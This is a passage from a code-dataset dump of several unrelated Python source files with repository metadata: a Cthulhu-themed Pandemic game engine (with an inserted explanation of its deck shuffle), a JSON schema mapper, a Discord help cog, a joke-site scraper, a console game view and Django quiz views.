add_conn('Church', 'Old Mill', 'Farmstead', 'Cafe', 'Historic Inn')\n add_conn('Farmstead', 'Swamp', 'Church', 'Historic Inn')\n add_conn('Swamp', 'Farmstead', 'Great Hall')\n add_conn('Historic Inn', 'Church', 'Farmstead')\n add_conn('Great Hall', 'Swamp', 'Woods', 'Market')\n add_conn('Woods', 'Great Hall', 'Market', 'Docks')\n add_conn('Market', 'Woods', 'Great Hall', 'Theater', 'Wharf')\n add_conn('Theater', 'Market')\n add_conn('Wharf', 'Market', 'Graveyard')\n add_conn('Graveyard', 'Wharf')\n add_conn('Docks', 'Woods', 'Boardwalk')\n add_conn('Boardwalk', 'Docks', 'Factory')\n add_conn('Factory', 'Hospital', 'Boardwalk')\n add_conn('Hospital', 'Factory', 'Pawn Shop')\n add_conn('Pawn Shop', 'Junkyard', 'Hospital')\n add_conn('Junkyard', 'Diner', 'Pawn Shop')\n\n def _setup_cultists(self):\n cultize = [3, 3, 2, 2, 1, 1]\n for count in cultize:\n draw = self.summon_deck.pop()\n self.summon_discards.append(draw)\n self.locations[draw.name].cultists += count\n self.announce('Placed {} cultist(s) at {}'.format(count, draw.name))\n self.cultist_reserve -= count\n shog = self.summon_deck.pop()\n self.summon_discards.append(shog)\n self.locations[shog.name].shoggoth = 1\n self.shoggoth_reserve -= 1\n self.announce('Placed a shoggoth at {}'.format(shog.name))\n\n def _deal_players(self):\n for player in self.players:\n start = 6 - len(self.players)\n while start:\n player.deal()\n start -= 1\n if player.role == MAGICIAN:\n self.draw_relic_card(player)\n\n def _initialize_evil(self):\n \"\"\" Divide the decks into 4 after players have each been dealt their cards\n Add 1 EvilStirs to each subset\n Shuffle each subset\n Concatenate subsets\n \"\"\"\n decks = [[], [], [], []]\n curr_deck = 0\n while self.player_deck:\n draw = self.player_deck.pop()\n decks[curr_deck % 4].append(draw)\n curr_deck += 1\n while decks:\n deck = decks.pop()\n deck.append(EvilStirs(self))\n shuffle(deck)\n self.player_deck += deck\n\n def _setup(self):\n if not self.num_players:\n get_num_players(self)\n\n if not self.players:\n while self.num_players:\n player = Player(self)\n self.rm.assign_role(player, self.auto)\n self.players.append(player)\n self.num_players -= 1\n 
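
_initialize_evil above implements the Pandemic-style "epidemic shuffle": deal the remaining deck into four piles, seed one Evil Stirs card into each, shuffle the piles, and stack them back up, so the four special cards land roughly evenly spaced through the deck. A standalone sketch with made-up card names:

    from random import shuffle

    deck = ['card-{}'.format(i) for i in range(20)]
    piles = [deck[i::4] for i in range(4)]  # deal round-robin into 4 piles

    rebuilt = []
    for pile in piles:
        pile.append('Evil Stirs')  # one special card per pile
        shuffle(pile)
        rebuilt += pile

    print(len(rebuilt), rebuilt.count('Evil Stirs'))  # 24 4

Because each Evil Stirs can only appear within its own quarter of the rebuilt deck, the game cannot draw two of them back to back early, which is the point of splitting before shuffling.
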
self.current_player = self.players[0]\n self.player_deck, self.relic_deck = get_player_relic_decks(self, self.num_players)\n self.summon_deck = get_summon_deck()\n self._setup_locations()\n self._setup_cultists()\n self._deal_players()\n self._initialize_evil()\n\n def seal_cost(self):\n cost = sum([\n SEAL_GATE_BASE_COST,\n -1 * int(REDUCE_SEAL_COST in self.effects),\n ])\n if self.current_player.role == DETECTIVE:\n cost -= 1\n return cost\n\n def seal_gate(self, town):\n town.sealed = True\n for loc in town.locations:\n if loc.cultists:\n loc.cultists -= 1\n self.cultist_reserve += 1\n if REDUCE_SEAL_COST in self.effects:\n self.effects.remove(REDUCE_SEAL_COST)\n self.announce(\n 'The gate in {} has been sealed! Cultists in this town reduced by 1 in each location'.format(town.name))\n self.show_board()\n\n def draw_relic_card(self, player):\n if self.relic_deck:\n relic = self.relic_deck.pop()\n self.announce('{} draws a relic card. {}: {}'.format(player.name(), relic.name, relic.text))\n player.hand.append(relic)\n player.limit_hand()\n\n def draw_player_card(self):\n if self.player_deck:\n return self.player_deck.pop()\n\n def add_cultist(self, location, respect_elder=True):\n town = self.locations[location].town\n if town.elder_sign and respect_elder:\n self.announce('An elder sign prevents a cultist from being added to {}'.format(location))\n elif self.locations[location].cultists == 3:\n # awaken ritual\n self.announce('{} is at cultist capacity - an awakening ritual occurs!'.format(location))\n self.awakening_ritual()\n else:\n self.locations[location].cultists += 1\n\n def sanity_roll(self, player=None):\n if SKIP_SANITY_CHECKS in self.effects:\n self.announce('Active effect precludes the need for a sanity check')\n return\n if not player:\n player = self.current_player\n choices = [(0, 0), # sanity, cultists\n (0, 0),\n (1, 0),\n (1, 0),\n (2, 0),\n (0, 2), ]\n sanity, cultists = choice(choices)\n if sanity:\n self.announce('** {} loses {} sanity **'.format(player.name(), sanity))\n player.sanity = max(0, player.sanity - sanity)\n elif cultists:\n self.announce('** {} summons 2 cultists to {} **'.format(player.name(), player.location))\n self.add_cultist(player.location)\n self.add_cultist(player.location)\n else:\n self.announce('** {} maintains a grip on reality. No effect. **'.format(player.name()))\n\n def awakening_ritual(self):\n for god in self.old_gods:\n if not god.revealed:\n god.revealed = True\n god.activate()\n if god.name != 'Cthulhu':\n confirm()\n break\n\n def reset_states(self):\n if SKIP_SUMMON in self.effects:\n self.effects.remove(SKIP_SUMMON)\n if SKIP_SANITY_CHECKS in self.effects:\n self.effect_tracker[SKIP_SANITY_CHECKS] -= 1\n if self.effect_tracker[SKIP_SANITY_CHECKS] <= 0:\n self.effects.remove(SKIP_SANITY_CHECKS)\n\n def summoning_rate(self):\n if len([god for god in self.old_gods if god.revealed]) > 3:\n return 3\n return 2\n\n def execute_action(self, action, instruction=None):\n self.current_player.execute_action(action, instruction)\n\n def play(self):\n if not self.players:\n self._setup()\n\n self.show_board()\n turn = 0\n while not self.game_over():\n self.current_player = self.players[turn % len(self.players)]\n self.announce('It is now {}\\'s turn (turn {})'.format(self.current_player.name(), turn + 1))\n self.current_player.do_turn()\n self.reset_states()\n self.show_board()\n turn += 1\n\n def discard(self, card):\n self.player_discards.append(card)\n\n def draw_summon(self):\n # rebuild deck if empty. 
This is not a loss condition\n if not self.summon_deck:\n discards = self.summon_discards\n shuffle(discards)\n self.summon_deck = deque(discards)\n self.summon_discards = []\n summon = self.summon_deck.pop()\n self.summon_discards.append(summon)\n self.announce('Summon deck draw: {}'.format(summon.name))\n self.add_cultist(summon.name)\n self.cultist_reserve -= 1\n if summon.shoggoths:\n self.move_shoggoths()\n\n def gate_distance(self, loc, visited=None):\n if not visited:\n visited = []\n if [_conn for _conn in loc.connections if _conn.gate and not _conn.town.sealed]:\n return 1\n visited.append(loc)\n paths = [self.gate_distance(_conn, visited) for _conn in loc.connections if _conn not in visited]\n paths = [path for path in paths if path] # dead end path is 0\n if paths:\n distance = 1 + min(paths)\n return distance\n return 999 # deadend\n\n def move_shoggoths(self, automate=False):\n \"\"\" Shoggoths move to the closest gate\n\n Special cases: 1. If two or more options are equidistant from a gate, player chooses\n 2. If shoggoth is on a gate, trigger an awakening ritual\n \"\"\"\n\n awaken = 0 # delay until current shoggoths move, in case one activates Hastor\n # TODO - test that this works with multiple shoggoths on one location\n for location in self.get_shoggoth_sites():\n if location.shoggoth:\n location.shoggoth -= 1\n if location.gate and not location.town.sealed:\n self.announce(\n 'The Shoggoth at {} enters the gate, triggering an awakening ritual'.format(location.name))\n awaken += 1\n self.shoggoth_reserve += 1\n else:\n opts = {}\n for conn in location.connections:\n if conn.gate and not conn.town.sealed:\n opts[0] = [conn]\n else:\n dist = self.gate_distance(conn)\n opts.setdefault(dist, [])\n opts[dist].append(conn)\n\n opts = opts[min(opts.keys())]\n if len(opts) == 1:\n opts[0].shoggoth += 1\n self.announce('Shoggoth moves from {} to {}'.format(location.name, opts[0].name))\n for player in self.players:\n if player.location == opts[0].name:\n self.announce('Shoggoth enters the location of {}, performing a sanity roll'.format(\n player.name()))\n self.sanity_roll(player)\n else:\n if automate:\n destination = opts[0]\n else:\n destination = get_input(opts, 'name', 'Shoggoth move options at {} are equidistant. '\n 'Current player chooses'.format(location.name))\n destination.shoggoth += 1\n for player in self.players:\n if player.location == destination.name:\n self.announce('Shoggoth enters the location of {}, performing a sanity roll'.format(\n player.name()))\n self.sanity_roll(player)\n self.announce('Shoggoth moves from {} to {}'.format(location.name, destination.name))\n for i in range(awaken):\n self.awakening_ritual()\n\n def move_player(self, location):\n \"\"\" Moves player to a location and checks for Shoggoth\n\n :return: None\n \"\"\"\n player = self.current_player\n player.location = location\n self.announce('{} moves to {}'.format(player.name(), location))\n if self.locations[player.location].shoggoth:\n self.announce('You\\'ve entered a location with a shoggoth. 
Performing a sanity roll...')\n self.sanity_roll()\n self.show_board()\n\n def get_shoggoth_sites(self):\n locs = []\n for location in self.locations.values():\n # if multiple shoggoths, add the location for each\n sites = [location] * location.shoggoth\n if sites:\n locs += sites\n return locs\n\n def summon_shoggoth(self):\n if not self.summon_deck:\n self.regroup_cultists()\n summon = self.summon_deck.popleft()\n town = self.locations[summon.name].town\n if town.elder_sign:\n self.announce('An elder sign prevents a shoggoth from being summoned to {}'.format(summon.name))\n else:\n self.announce('A Shoggoth has been summoned at {}'.format(summon.name))\n self.shoggoth_reserve -= 1\n if self.shoggoth_reserve < 0:\n return # stop here\n self.summon_discards.append(summon)\n self.locations[summon.name].shoggoth += 1\n for player in self.players:\n if player.location == summon.name:\n self.sanity_roll(player)\n return summon.name\n\n def regroup_cultists(self):\n discards = self.summon_discards\n shuffle(discards)\n self.summon_deck += discards\n self.summon_discards = []\n\n def game_over(self):\n sealed = [town for town in self.towns if town.sealed]\n if len(sealed) == 4:\n self.announce('The game is over. You have won!')\n return True\n\n loss_condition = None\n # TODO - this really isn't a problem unless they need to use a cultist/draw/shogg. We should just have an\n # attribute that the things using this can check\n if self.cultist_reserve < 0:\n loss_condition = 'Not enough cultists in reserve.'\n if self.shoggoth_reserve < 0:\n loss_condition = 'Not enough shoggoths in reserve.'\n if self.old_gods[-1].revealed:\n loss_condition = self.old_gods[-1].text\n if not any([player.sanity for player in self.players if player.sanity > 0]):\n loss_condition = 'All players are insane.'\n if not self.player_deck:\n loss_condition = 'Player deck has been depleted.'\n\n if loss_condition:\n self.announce('You have lost: {}'.format(loss_condition))\n return True\n\n\nclass Town(PandemicObject):\n connections = None\n sealed = False\n elder_sign = False\n locations = None\n\n def __init__(self, name):\n super(Town, self).__init__(name)\n self.connections = []\n self.locations = []\n\n\nclass Location(PandemicObject):\n bus_stop = False\n cultists = 0\n connections = None\n gate = False\n town = None\n shoggoth = 0 # could technically have multiple\n\n def __init__(self, name, town, bus_stop=False, gate=False):\n super(Location, self).__init__(name)\n self.town = town\n self.connections = []\n if self not in town.locations:\n town.locations.append(self)\n self.bus_stop = bus_stop\n self.gate = gate\n","repo_name":"ewohnlich/esoth.pandemic-cthulhu","sub_path":"esoth/pandemic_cthulhu/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":19414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44130639794","text":"\"\"\"Switchboard module\"\"\"\n# pylint: disable=too-few-public-methods\nfrom .cords import Cord\nfrom .diggable import Diggable\nfrom .exceptions import SwitchboardMissingFieldException\n\n\nclass Switchboard:\n \"\"\"Switchboard objects helps converting JSON schemas.\n Switchboard consists of cords that can define how data\n list moved from schema to schema.\n \"\"\"\n\n OPTIONS_CLASS = \"Meta\"\n\n # Missing data options\n EXCLUDE = \"EXCLUDE\"\n INCLUDE = \"INCLUDE\"\n RAISE = \"RAISE\"\n\n # Attributes\n _options = None\n _many = None\n\n def __init__(self, many=False):\n self._many = many\n self._options = 
{\"missing\": self.INCLUDE, **self._get_options()}\n\n def _get_options(self):\n _options = {}\n _meta = getattr(self, self.OPTIONS_CLASS, None)\n\n for attr_name in dir(_meta):\n if not attr_name.startswith(\"__\"):\n _options[attr_name] = getattr(_meta, attr_name)\n\n return _options\n\n def _get_cords(self):\n _cords = {}\n for attr_name in dir(self):\n attr = getattr(self, attr_name)\n if isinstance(attr, Cord):\n _cords[attr_name] = attr\n return _cords\n\n def _apply_for_object(self, data):\n new_data = {}\n diggable = Diggable(data)\n\n for cord_name, cord_inst in self._get_cords().items():\n value, is_found = cord_inst.apply(diggable)\n\n if not is_found and self._options[\"missing\"] is self.EXCLUDE:\n continue\n\n if not is_found and self._options[\"missing\"] is self.RAISE:\n raise SwitchboardMissingFieldException(\n f'Field \"{cord_name}\" is missing'\n )\n\n new_data[cord_name] = value\n\n return new_data\n\n def apply(self, data):\n \"\"\"Switchboard is applied via this method.\n \"\"\"\n\n if self._many:\n return list(map(self._apply_for_object, data))\n\n return self._apply_for_object(data)\n","repo_name":"juhoen/Switchboard","sub_path":"switchboard/switchboard.py","file_name":"switchboard.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9200551489","text":"import discord\nfrom typing import List, Dict\nfrom discord.ext import commands\nfrom discord.commands import Option, SlashCommandGroup, SlashCommand, command\nfrom ..package_manager import PackageManager\nfrom src.XEMB.XEMB_parser import XEmbed, XEMBParser\n\n\n# ------------------------------------------------------------------------------\n\n\ndef get_all_components(prefix: str) -> Dict[str, XEmbed]:\n pm = PackageManager(None)\n cmds = {}\n for pkg in filter(lambda p: p.docs, pm.all_packages):\n xembeds = pkg.docs_parser.parse_all()\n xembeds = {n.replace(prefix, \"\"): e for n, e in xembeds.items()\n if n.startswith(prefix)}\n for ename, xembed in xembeds.items():\n cmds[f\"{ename}\"] = xembed\n return cmds\n\n\ndef get_all_manuals(other_path: str) -> Dict[str, XEmbed]:\n \"\"\"Возвращает все пакетные мануалы, а также мануалы из other_path\"\"\"\n mans = get_all_components(\"man-\")\n mans.update(XEMBParser(other_path).parse_all())\n return mans\n\n\ndef get_cmd_opt() -> Option:\n cmds = get_all_components(\"cmd-\")\n opt = Option(str, \"О какой команде вывести справку.\", required=True,\n choices=cmds.keys())\n if not cmds:\n opt.description = \"Команд нет или у пакетов, содержащих их, отсутствует\\\n документация\"\n return opt\n\n\ndef get_man_opt() -> Option:\n mans = get_all_manuals(\"xml/help.xml\")\n opt = Option(str, \"Выберете мануал для прочтния\", required=True,\n choices=mans.keys())\n if not mans:\n opt.description = \"Мануалов нет или у пакетов, содержащих их, \\\nотсутствует документация\"\n return opt\n\n\n# ------------------------------------------------------------------------------\n\n\nclass Help(commands.Cog):\n helps = SlashCommandGroup(\"help\", \"desc\", guild_ids=[634453910236561419])\n\n def __init__(self, bot):\n self.bot = bot\n self.pm = PackageManager(bot)\n self._cmd_cache = get_all_components(\"cmd-\")\n self._man_cache = get_all_manuals(\"xml/help.xml\")\n \n @command()\n async def help(self, ctx, man: get_man_opt()=\"Про Кенни\"):\n \"\"\"Выводит справку о чём-либо\"\"\"\n if man not in self._man_cache: \n await ctx.delete()\n return\n await 
ctx.respond(embed=self._man_cache[man])\n\n @helps.command()\n async def command(self, ctx, cmd: get_cmd_opt()):\n \"\"\"Выводит справку по команде\"\"\"\n if cmd not in self._cmd_cache: \n await ctx.delete()\n return\n await ctx.respond(embed=self._cmd_cache[cmd])\n\ndef setup(bot):\n bot.add_cog(Help(bot))\n","repo_name":"DarkSeriusCode/Kenny","sub_path":"pkgman/help/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34632771726","text":"# encoding = utf-8\nimport requests\nfrom bs4 import BeautifulSoup\nfrom multiprocessing import pool\nimport time\nimport os\nimport json\nimport loguru\nimport re\n\n# from queue import Queue # 用于多线程消息队列(url消费者)\n\nlogger = loguru.logger\n\n\ndef get_page(url):\n response = requests.get(url)\n if response.status_code != 200:\n return None\n html = response.text\n return html\n\n\ndef parse_page(html):\n if html is None:\n return\n soup = BeautifulSoup(html, 'lxml')\n box = soup.find('div', id=\"footzoon\")\n title_list = box.find_all('h3', class_='red')\n content_list = box.find_all('div', id='endtext')\n date_click_list = box.text.strip().split('糗事百科')[1:]\n\n for title, content, date_click in zip(title_list, content_list, date_click_list):\n joke = dict()\n joke['title'], joke['content'] = title.text.strip(), content.text.strip()\n try:\n joke['date'] = date_click.split()[0]+date_click.split()[1]\n joke['click'] = re.match(\n r\"Click:(\\d+).*?\", date_click.split()[2]).group(1)\n except Exception as e:\n continue\n yield joke\n\n\ndef crawl(url):\n html = get_page(url.format(i))\n jokes = parse_page(html)\n for joke in jokes:\n local_fp = open('qsbk_multi.json', 'a', encoding='utf-8')\n local_fp.write(json.dumps(joke))\n local_fp.write('\\n')\n local_fp.close()\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n start = time.time()\n url = \"http://www.lovehhy.net/Joke/Detail/QSBK/{}\"\n url_list = []\n for i in range(1, 5):\n url_list.append(url.format(i))\n pool = pool.Pool()\n pool.map(crawl, url_list)\n print(time.time()-start)","repo_name":"ilyi1116/python3_course_code","sub_path":"并发爬取糗事百科笑话(官网升级中)/多线程.py","file_name":"多线程.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27797815217","text":"from lib.game.enums import SignalLevel\nfrom lib.game.state.components import DetectorState\nfrom view.console.components import ComponentView\nfrom view.console.controls import DirectionLabel\nfrom view.console.screen import Screen\n\n\nclass _Texts:\n NO_TARGETS_MESSAGE = 'Вы не чувствуете ничего необычного.'\n DETECTOR_MESSAGE = 'В направлении на {direction} что-то есть.'\n SIGNAL_MESSAGE = {\n SignalLevel.Low: 'Вы едва ощущаете это.',\n SignalLevel.Average: 'Это явно чувствуется.',\n SignalLevel.High: 'Вы совершенно уверены в этом.',\n }\n\n\nclass DetectorView(ComponentView[DetectorState]):\n def render(self, state: DetectorState):\n messages = []\n if state.targets:\n for target in state.targets:\n direction_label = DirectionLabel(target.direction)\n messages.append(_Texts.DETECTOR_MESSAGE.format(direction=direction_label))\n messages.append(_Texts.SIGNAL_MESSAGE[target.signal_level])\n else:\n messages.append(_Texts.NO_TARGETS_MESSAGE)\n\n return 
Screen.join(messages)\n","repo_name":"janscf/angry_oleg","sub_path":"view/console/components/detector_view.py","file_name":"detector_view.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6861063868","text":"from re import sub\nfrom django.shortcuts import render\nfrom general.models import Subject_Assignment, Subject\nfrom .models import Quiz,Attempt,On_Test,Assignment,Question\nfrom django.views.generic.list import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic.detail import SingleObjectMixin\nfrom datetime import datetime, date, timedelta\nfrom django.http import HttpResponse, JsonResponse\nfrom django.utils import timezone\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom general.views import is_student, is_stud_faculty_user, is_faculty\nfrom django.shortcuts import redirect\nimport json\nfrom django.views.generic.edit import FormView\nfrom django.db.models import Q\nfrom .forms import QuizForm,ResponseForm\nfrom django.template.loader import render_to_string\n# Create your views here.\n\nclass QuizListView(LoginRequiredMixin,ListView):\n model=Quiz\n login_url = 'login'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['now'] = timezone.now()\n \n return context\n \n def get_queryset(self):\n #stud = request.user.student\n attempted = Attempt.objects.filter(user=self.request.user).values_list('Quiz',flat=True)\n subjects = Subject_Assignment.objects.filter(programme__department__degree_category__id=self.request.user.student.department.degree_category.id).values_list('id',flat=True)\n return Quiz.objects.filter(subjects__in=subjects,openDate__lte=datetime.today(), closeDate__gte=datetime.today()).order_by('-openDate').exclude(id__in=attempted)\n \n\n\nclass QuizDetail(SingleObjectMixin,LoginRequiredMixin,ListView):\n paginate_by = 1\n template_name = \"quiz/quiz_detail.html\"\n login_url = 'login'\n \n def get(self, request, *args, **kwargs):\n current_user = request.user\n \n if Attempt.objects.filter(user=self.request.user,Quiz=self.kwargs['pk']).values_list('Quiz',flat=True).exists():\n return HttpResponse(\"No More attempts allowed\") \n\n if not On_Test.objects.filter(user=request.user).exists():\n On_Test.objects.create(user=request.user,test_id=self.kwargs['pk'],started_time=datetime.now())\n\n old_one=[]\n\n current_test=Quiz.objects.get(id=self.kwargs['pk'])\n old_test=On_Test.objects.get(user=request.user) \n \n if current_test.id == old_test.test.id:\n if not current_test.timed_exam:\n self.mins = None\n self.seconds = None\n\n else:\n then = old_test.started_time\n now = datetime.strptime(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),'%Y-%m-%d %H:%M:%S') \n diff = (now - then).total_seconds() \n self.mins = current_test.duration_in_minutes - ((diff // 60) + 1)\n self.seconds = 59 - diff % 60\n\n if request.user.groups.filter(name='Student').exists():\n self.object = self.get_object(queryset=Quiz.objects.filter((Q(subject_assignment__programme__department__degree_category__id=request.user.student.programme.department.degree_category.id)), openDate__lte=date.today(), closeDate__gte=date.today()))\n print(\"self\",self.object)\n \n elif request.user.groups.filter(name='faculty').exists():\n subjects = request.user.faculty\n self.object = 
self.get_object(queryset=Quiz.objects.filter((Q(subject_assignment__programme__department__degree_category__id=request.user.faculty.programme.department.degree_category.id)),openDate__lte=date.today(), closeDate__gte=date.today()).distinct())\n\n self.questions=list(Assignment.objects.filter(Quiz=self.object.id).values_list('Question_id', flat=True))\n self.assignment = Assignment.objects.get(Quiz=self.object.id,Question=self.questions[0])\n print(\"s-q\",self.questions)\n\n else:\n return render(request, 'quiz/old_test.html', {'old_test':old_test,'current_test':current_test,})\n \n\n return super().get(request, *args, **kwargs)\n\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context={\n 'quiz' : self.object,\n 'question_count' : len(self.questions),\n 'question_no' : 0,\n 'assignment' : self.assignment,\n 'questions' : self.questions,\n 'question_next' : 1,\n 'question_prev' : -1,\n 'mins':self.mins,\n 'seconds':self.seconds,\n \n \n } \n return context\n \n \n def get_queryset(self): \n return \"Query set\"\n \n \n def post(self,request, *args, **kwargs): \n return HttpResponseRedirect('/')\n\n@login_required(login_url='login')\ndef quiz_load_question(request):\n data = dict()\n no = int(request.GET.get('question_no'))\n test = request.GET.get('test')\n \n #get test questions\n test_object=Quiz.objects.get(id=test)\n\n questions=list(Assignment.objects.filter(Quiz=test_object).values_list('Question_id', flat=True))\n \n assignment = Assignment.objects.get(Quiz=test_object,Question=questions[no])\n \n \n context={ \n\n 'assignment' : assignment,\n 'test':test_object,\n 'question_no': no, \n \n }\n print(\"no\",assignment)\n data['question'] = render_to_string('quiz/quiz_questions_fly.html', context)\n print(\"no\",data['question']) \n data['question_no'] = no\n data['question_id'] = assignment.Question.id\n data['question_count'] = len(questions)\n\n return JsonResponse(data)\n\n\n\n\n@login_required(login_url='login') #Authentication\n@user_passes_test(is_stud_faculty_user,login_url='login') #Authorization \ndef quizsubmit(request):\n json_data=json.loads(request.body.decode('utf-8'))\n data = dict()\n current_user = request.user\n quiz_id=int(json_data[0]['quizid'])\n \n quiz = Quiz.objects.get(id=quiz_id) \n if len(json_data)==1 and not 'questionid' in json_data[0]:\n Attempt.objects.create(user=current_user,Quiz=quiz,score=0)\n score=0\n On_Test.objects.filter(user=current_user,test=quiz).delete()\n else:\n score = Attempt.Create(quiz_id,current_user,json_data)\n \n data['score'] = score\n return JsonResponse(data)\n\n@login_required(login_url='login') #Authentication\n@user_passes_test(is_stud_faculty_user,login_url='login') #Authorization\ndef my_scores(request):\n if is_student(request.user):\n subjects = Subject_Assignment.objects.filter(programme=request.user.student.programme,semester=request.user.student.semester,year=request.user.student.year)\n Attempts = Attempt.objects.filter(user=request.user,Quiz__subject_assignment__in=subjects.all()).order_by('-date').distinct()\n elif is_faculty(request.user): \n subjects= request.user.faculty.programme.title\n print(subjects)\n #Attempts = Attempt.objects.filter(user=request.user,Quiz__subject_assignment__programme__title__in=subjects).order_by('-date').distinct()\n Attempts = Attempt.objects.filter(user=request.user).order_by('-date').distinct()\n print(Attempts)\n return render(request,'quiz/my_scores.html',{'Attempts':Attempts,'subjects':subjects})\n \n@login_required(login_url='login') 
#Authentication\n@user_passes_test(is_stud_faculty_user,login_url='login') #Authorization\ndef filter_scores(request):\n data = dict()\n subject = request.GET.get('subject')\n print(\"scorefilter\")\n Attempts = Attempt.objects.filter(user=request.user,Quiz__subject_assignment=subject).order_by('-date')\n data['html_scores'] = render_to_string('quiz/scores.html',{'Attempts':Attempts},request=request)\n return JsonResponse(data)\n\nclass QuizView(FormView):\n template_name = 'quiz/addquiz.html'\n form_class = QuizForm\n success_url = '/'\n model=Quiz\n\n \n def form_valid(self, form): \n form.save()\n return super().form_valid(form)\n\ndef manage_quiz(request,quiz_id):\n '''author = Assignment.objects.get(Quiz__id=quiz_id)\n QuizInlineFormSet = inlineformset_factory(Assignment, Response, fields=('option',))\n if request.method == \"POST\":\n formset = BookInlineFormSet(request.POST, request.FILES, instance=author)\n if formset.is_valid():\n formset.save()\n # Do something. Should generally end with a redirect. For example:\n return HttpResponseRedirect(author.get_absolute_url())\n else:\n formset = BookInlineFormSet(instance=author)\n return render(request, 'manage_books.html', {'formset': formset})'''\n'''@login_required(login_url='login')\ndef ques_upload(request):\n if request.user.username == \"admin\":\n if \"GET\" == request.method:\n return render(request, 'quiz/quest.html', {})\n else:\n excel_file = request.FILES[\"excel_file\"]\n\n # you may put validations here to check extension or file size\n\n wb = openpyxl.load_workbook(excel_file)\n\n # getting a particular sheet by name out of many sheets\n worksheet = wb[\"Sheet1\"]\n print(worksheet)\n\n excel_data = list()\n # iterating over the rows and\n # getting value from each cell in row\n for row in worksheet.iter_rows():\n row_data = list()\n q = Question(name=row[0].value,description=row[1].value,answer_description=row[2].value)\n q.save()\n\n for i in range(3,len(row),2):\n o = Option(name=row[i].value,value=row[i+1].value,Question=q)\n o.save()\n\n for cell in row:\n row_data.append(str(cell.value))\n excel_data.append(row_data)\n\n return render(request, 'quiz/quest.html', {\"excel_data\":excel_data})\n else:\n return render(request, 'quiz/quest.html', {})'''\n\n\nclass QuizAnswerDetail(SingleObjectMixin,LoginRequiredMixin,ListView):\n template_name = \"quiz/answer_detail.html\"\n login_url = 'login'\n paginate_by = 10\n \n def get(self, request, *args, **kwargs):\n current_user = request.user \n self.object=self.get_object(queryset=Quiz.objects.all())\n if not Attempt.objects.filter(user=request.user,Quiz=self.object).exists():\n return redirect('home')\n return super().get(request, *args, **kwargs)\n\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['quiz'] = self.object\n \n return context\n\n \n def get_queryset(self):\n return self.object.assignment_set.all()\n\n\n\n\n\n@login_required(login_url='login')\ndef load_question(request):\n data = dict()\n subject = int(request.GET.get('subject'))\n grade = request.GET.get('grade')\n quiz = request.GET.get('quiz')\n get_assigned_questions=Assignment.objects.filter(Quiz=quiz).values_list('Question', flat=True)\n\n if grade:\n if request.user.groups.filter(name='School').exists():\n question = Question.objects.filter(grade__grade=grade,subject=subject,school=request.user.school).exclude(id__in=get_assigned_questions)\n elif request.user.groups.filter(name='Teacher').exists():\n question = 
Question.objects.filter(grade__grade=grade,subject=subject,created_by=request.user).exclude(id__in=get_assigned_questions)\n\n context={\n \n 'questions' : question, \n \n }\n data['question'] = render_to_string('quiz/question_fly.html', context) \n else:\n data['error'] = \"Something went Wrong\"\n return JsonResponse(data)\n\n\n\n@login_required(login_url='login')\ndef ajax_search_questions(request):\n\n data = dict()\n subject = int(request.GET.get('subject'))\n grade = request.GET.get('grade')\n question = request.GET.get('question')\n quiz = request.GET.get('quiz')\n get_assigned_questions=Assignment.objects.filter(Quiz=quiz).values_list('Question', flat=True)\n print(\"AJAA get serach\")\n if grade:\n \n if request.user.groups.filter(name='College').exists():\n print(\"school\")\n question = Question.objects.filter(subject=subject,description__icontains = question,school=request.user.school).exclude(id__in=get_assigned_questions)\n elif request.user.groups.filter(name='Faculty').exists():\n print(\"Teacher\")\n question = Question.objects.filter(subject=subject,description__icontains = question,created_by=request.user).exclude(id__in=get_assigned_questions) \n print(question) \n context={ \n 'questions' : question,\n }\n data['question'] = render_to_string('quiz/question_fly.html', context) \n data['question_count'] =question.count()\n\n else:\n data['error'] = \"Something went Wrong\"\n return JsonResponse(data)\n\n\n\n\n@login_required(login_url='login')\ndef ajax_load_subjects(request):\n data=dict()\n programme=request.GET.get('grade')\n print(\"degree\",programme)\n subjets = Subject_Assignment.objects.filter(programme=programme).values_list('subject', flat=True).distinct() \n print(\"testoo\",subjets)\n subjects = Subject.objects.filter(id__in=subjets) \n print(subjects)\n context={ \n 'subjects' : subjects, \n }\n data['subjects'] = render_to_string('quiz/choose_subjects.html', context) \n return JsonResponse(data)\n\n\ndef delete_on_test(request,test):\n On_Test.objects.filter(user=request.user,test=test).delete()\n data = dict()\n data['status'] = 'done' \n return JsonResponse(data)","repo_name":"madhanumk/elearn","sub_path":"quiz/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73514688747","text":"#! 
